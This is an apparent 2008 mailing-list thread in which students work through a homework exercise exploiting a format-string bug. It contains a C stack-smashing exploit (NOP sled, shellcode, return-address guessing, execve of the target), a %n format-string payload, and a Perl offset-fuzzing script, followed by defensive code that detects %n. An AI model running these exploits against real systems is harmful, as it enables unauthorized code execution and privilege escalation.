If that's the case then it should work... I just took another look: why is your string using %u?
I remember I used to put the address at the front of the buffer, then a bunch of NOPs, then the shellcode. I wrote one a long time ago and don't know whether it still works; copying it verbatim won't help,
but use it as a reference; here it is:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"   /* provides: char shellcode[] */
#define BUFFERSIZE 200
#define NOP '\x90'
#define TARGET "/usr/local/bin/backup"
#define OURTARGET "./backup"
unsigned long get_sp(void)
{
    unsigned long sp;
    __asm__("movl %%esp, %0" : "=r"(sp));   /* x86-32 only */
    return sp;
}
int main(int argc, char *argv[])
{
    char *args[2];
    char *env[1];
    char buffer[BUFFERSIZE];
    int off = 0;
    if (argc > 1) {
        //for trying to manually set the offset
        off = atoi(argv[1]);
    }
    //for (off=0; off<1024; off+=4) {
    int i;
    long *ptr = (long *)buffer;
    long ret = get_sp() + off; //ret address
    printf("trying offset: %d | ret: %lx\n", off, ret);
    { //generate buffer
        for (i = 0; i < BUFFERSIZE; i += 4)
            *(ptr++) = ret;
        for (i = 0; i < BUFFERSIZE/2; i++)
            buffer[i] = NOP;
        char *cptr = buffer + BUFFERSIZE/2 - strlen(shellcode)/2;
        for (i = 0; i < strlen(shellcode); i++)
            *(cptr++) = shellcode[i];
        buffer[BUFFERSIZE-1] = '\0';
    }
    char newbuff[BUFFERSIZE+5];
    newbuff[0] = '%'; newbuff[1] = '1'; newbuff[2] = '1'; newbuff[3] = '3'; newbuff[4] = 'd';
    //newbuff[5] = '\xcc'; newbuff[6] = '\xff'; newbuff[7] = '\xbf'; newbuff[8] = '\xbf';
    for (i = 5; i < BUFFERSIZE+5; i++) {
        newbuff[i] = buffer[i-5];
    }
    //args[0] = "\xcc\xff\xbf\xbf_%08x.%n";
    args[0] = newbuff;
    args[1] = NULL;
    env[0] = NULL;
    if (execve(TARGET, args, env) < 0)
        fprintf(stderr, "execve failed.\n");
    // }
    return 0;
}
2008/10/2 qi chai <[EMAIL PROTECTED]>:
> Hehe, thanks bro, you're being modest!
> Actually, in this environment address randomization and the non-writable stack are both turned off~~~
> There should be a way to exploit it, otherwise this homework would have no answer, heh
>
> PS: I see from your profile that you're in Canada, right?
>
> 2008/10/2 Haoyu Tang <[EMAIL PROTECTED]>
>>
>> I also find format string (FS) overflows harder to exploit than the other kinds; I haven't succeeded many times either... It mainly depends on the defences of the current OS, such as randomizing the start address
>> or refusing writes to the stack, so FS isn't that useful nowadays, unlike before.
>>
>> Also, judging by your system's error message, it seems the OS already detected the overflow and killed your exploit -_-
>>
>> >>>Program received signal SIGSEGV<<<, Segmentation fault.
>>
>>
>> P.S. I'm no expert, wasn't before, am not now, and won't be later =.= Compared with the real pros in the security world I'm just a beginner on the software engineering side with an interest in system security~~
>> Learning never ends; remember to share ;)
>>
>> 2008/10/2 qi chai <[EMAIL PROTECTED]>:
>> > Heh, thanks for the detailed analysis, expert!
>> > My judgement is also that there's a format string overflow at fprintf(stderr, argv[1]);
>> > After carefully reading the scut / team teso paper and Googling some material, I understand the principle and how to print the contents of an arbitrary address,
>> > but I still have no idea where to start on the exploit. Mainly I find writing to an address too troublesome, and as soon as I use %n I get a segfault (vsprintf error).
>> > I hope you can give me a few pointers on the exploit!
>> >
>> > The error is as follows:
>> > Starting program: /home/raullen/Desktop/T/primetarget
>> >
>> > "\x20\xf4\xff\xbf________%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u|%n|"
>> > Program received signal SIGSEGV, Segmentation fault.
>> > 0xb7ec764d in vfprintf () from /lib/tls/i686/cmov/libc.so.6
>> > (gdb) c
>> > Continuing.
>> >
>> > Below is a small fuzzing script I wrote to help locate the stack-popping position:
>> > #use strict;
>> > #open (stdout, ">>1.txt");
>> > $count = 131;
>> > #$cmd = "/home/raullen/Desktop/T/primetarget "
>> > $pre = "\"AAAABBBB________";
>> > $suf = "|%08x|";
>> > while ($count < 132) {
>> > $line = "%u";
>> > $cmd = "/home/raullen/Desktop/T/primetarget ";
>> > #print "A"x$count; print "\n";
>> > $i = $count;
>> > REDO:
>> > if($i>0){
>> > $line = $line."%u";
>> > $i--;
>> > goto REDO;
>> > }
>> > #print $line;print "\n";
>> > print $count;
>> > $count++;
>> > $cmd = $cmd.$pre.$line.$suf." \" >>1.txt 2>&1";
>> > system($cmd);
>> > print $cmd;
>> > print "\n";
>> > }
>> >
>> > --
>> > The highest excellence is like that of water! www.raullen.net
>> >
>>
>>
>>
>> --
>> Atomic.Ping
>
>
>
> --
> The highest excellence is like that of water! www.raullen.net
>
--
Atomic.Ping
--~--~---------~--~----~------------~-------~--~----~
To post to this mailing list, send mail to [email protected]
To unsubscribe from this list, send mail to [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---
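The bug the thread is chasing is the fprintf(stderr, argv[1]) call, where user data is passed as the format string itself. As an added example (not code from the thread or from the assignment's binary), the hardened form of that call beside a checker that flags conversion directives, and specifically the write directive %n, in data about to be used as a format; the sample input is constructed in the shape of the string posted above.

```c
#include <stdio.h>
#include <string.h>

/* Hardened form of the thread's fprintf(stderr, argv[1]): user data goes in
 * as an argument, never as the format, so "%n" in it is printed literally.
 * Returns the byte count snprintf reports. */
int render_safe(char *dst, size_t cap, const char *user)
{
    return snprintf(dst, cap, "%s", user);   /* was: fprintf(stderr, user) */
}

/* Number of conversion directives in s; "%%" is a literal percent sign and
 * is not counted. Any non-zero result in data about to be used as a format
 * string is what a review or a runtime guard should flag. */
int count_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }   /* skip escaped "%%" */
        n++;
    }
    return n;
}

/* 1 if s contains a %n directive (flags, width, precision, "$" positional
 * index and length modifiers may sit in between): the one directive that
 * writes to memory instead of reading it. */
int has_write_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        const char *p = s + 1;
        while (*p && strchr("0123456789$.-+ #*hlLqjzt", *p)) p++;
        if (*p == 'n') return 1;
    }
    return 0;
}
int main(int argc, char *argv[])
{
    /* constructed sample shaped like the input posted in the thread */
    const char *sample = argc > 1 ? argv[1] : "AAAABBBB________%u%u%u|%08x|%n|";
    char out[256];
    render_safe(out, sizeof out, sample);
    printf("rendered safely: %s\n", out);
    printf("directives: %d, has %%n: %d\n", count_directives(sample),
           has_write_directive(sample));
    return 0;
}
```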